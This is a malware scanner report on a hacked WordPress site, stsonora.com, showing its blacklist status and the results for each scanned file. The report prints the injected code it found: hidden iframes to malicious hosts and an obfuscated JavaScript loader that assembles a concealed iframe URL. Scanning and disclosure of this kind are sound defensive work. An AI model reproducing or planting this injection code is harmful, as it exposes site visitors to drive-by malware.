New scan:

Malware Scanner report for stsonora.com

Malicious/Suspicious/Total urls checked
1/0/16
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "stsonora.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
2/0/2
2 malicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=stsonora.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.stsonora.com/
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Sun, 22 Jun 2014 05:15:31 GMT
Pragma: no-cache
Location: http://stsonora.com/
Server: Microsoft-IIS/8.5
Content-Length: 146
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=l6o8dt7cemv63ck4279g4mt5m5; path=/
Set-Cookie: wfvt_350183620=53a666745b48d; expires=Sun, 22-Jun-2014 05:45:32 GMT; path=/; httponly
X-Pingback: http://stsonora.com/xmlrpc.php
X-Powered-By: PHP/5.3.26
X-Powered-By: ASP.NET
clean
http://stsonora.com/
200 OK
Content-Length: 29535
Content-Type: text/html
malicious
Page code contains blacklisted domain: gamedev.raconsultants.net

...[32490 bytes skipped]...
.resize(function() {
$('#main_menu > ul')
.supersubs({
minWidth: 12, // minimum width of sub-menus in em units
maxWidth: 27, // maximum width of sub-menus in em units
extraWidth: 1 // extra width can ensure lines don't sometimes turn over
});
});

})(jQuery);
</script><iframe src="http://gamedev.raconsultants.net/ok.php" width="1" height="1"></iframe>vw='abi';s='rg';vo='ifr';h='lli';ov='a';p='i';a='r';d='s';e='k';m='c';o='p:/';b='?';zj='b';bi='a.o';hb='me';pa='ng.';c='/';ee='/';mo='z';g='htt';lg='y';w='i';y='fra';x=w.concat(y,hb);te=d.concat(a,m);t=g.concat(o,c,zj,p,h,pa,mo,vw,lg,ov,e,bi,s,ee,b,vo);var bf=document.createElement(x);bf.setAttribute('width','5');bf.setAttribute('height','5');bf.setAttribute('style','display:none');bf.setAttribute(te,t);document.body.appendChild(b
...[412 bytes skipped]...

Malicious iFrame found.
size: 1x1     
src: http://gamedev.raconsultants.net/ok.php
This URL is marked by Google as suspicious

<iframe src="http://gamedev.raconsultants.net/ok.php" width="1" height="1">

Malicious iFrame found.
size: 0x0     
src: http://zabiyaka.org/file/ok.php
This URL is marked by Google as suspicious

<iframe src="http://zabiyaka.org/file/ok.php" width="0" height="0">

http://stsonora.com/wp-includes/js/jquery/jquery.js?ver=1.11.0
200 OK
Content-Length: 96402
Content-Type: application/javascript
clean
http://stsonora.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 7200
Content-Type: application/javascript
clean
http://cdnjs.cloudflare.com/ajax/libs/modernizr/2.6.2/modernizr.min.js?ver=2.6.2
200 OK
Content-Length: 15414
Content-Type: application/javascript
clean
http://stsonora.com/wp-content/plugins/CuteSlider/js/cute.slider.js?ver=1.1.1
200 OK
Content-Length: 42563
Content-Type: application/javascript
clean
http://stsonora.com/wp-content/plugins/CuteSlider/js/cute.transitions.all.js?ver=1.1.1
200 OK
Content-Length: 16781
Content-Type: application/javascript
clean
http://cdnjs.cloudflare.com/ajax/libs/respond.js/1.1.0/respond.min.js?ver=1.1.0
200 OK
Content-Length: 4069
Content-Type: application/javascript
clean
http://stsonora.com/wp-content/plugins/google-calendar-events/js/jquery-qtip.js
200 OK
Content-Length: 38428
Content-Type: application/javascript
clean
http://stsonora.com/wp-content/plugins/google-calendar-events/js/gce-script.js
200 OK
Content-Length: 1616
Content-Type: application/javascript
clean
http://stsonora.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.plugins.min.js?ver=3.9.1
200 OK
Content-Length: 17128
Content-Type: application/javascript
clean
http://stsonora.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?ver=3.9.1
200 OK
Content-Length: 55455
Content-Type: application/javascript
clean
http://stsonora.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4
200 OK
Content-Length: 4289
Content-Type: application/javascript
clean
http://stsonora.com/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.4
200 OK
Content-Length: 6521
Content-Type: application/javascript
clean
http://stsonora.com/wp-includes/js/jquery/ui/jquery.ui.tabs.min.js?ver=1.10.4
200 OK
Content-Length: 11623
Content-Type: application/javascript
clean
http://stsonora.com/wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js?ver=1.10.4
200 OK
Content-Length: 35806
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: stsonora.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Sun, 22 Jun 2014 05:15:33 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.5
Content-Length: 29535
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://stsonora.com/>; rel=shortlink
Set-Cookie: PHPSESSID=ls3k2hltv0koqdepqbce10alj6; path=/
Set-Cookie: wfvt_350183620=53a6667575b1d; expires=Sun, 22-Jun-2014 05:45:33 GMT; path=/; httponly
X-Pingback: http://stsonora.com/xmlrpc.php
X-Powered-By: PHP/5.3.26
X-Powered-By: ASP.NET

...29535 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: stsonora.com
Referer: http://www.google.com/search?q=stsonora.com

Result:
The result is similar to the first query. There are no suspicious redirects found.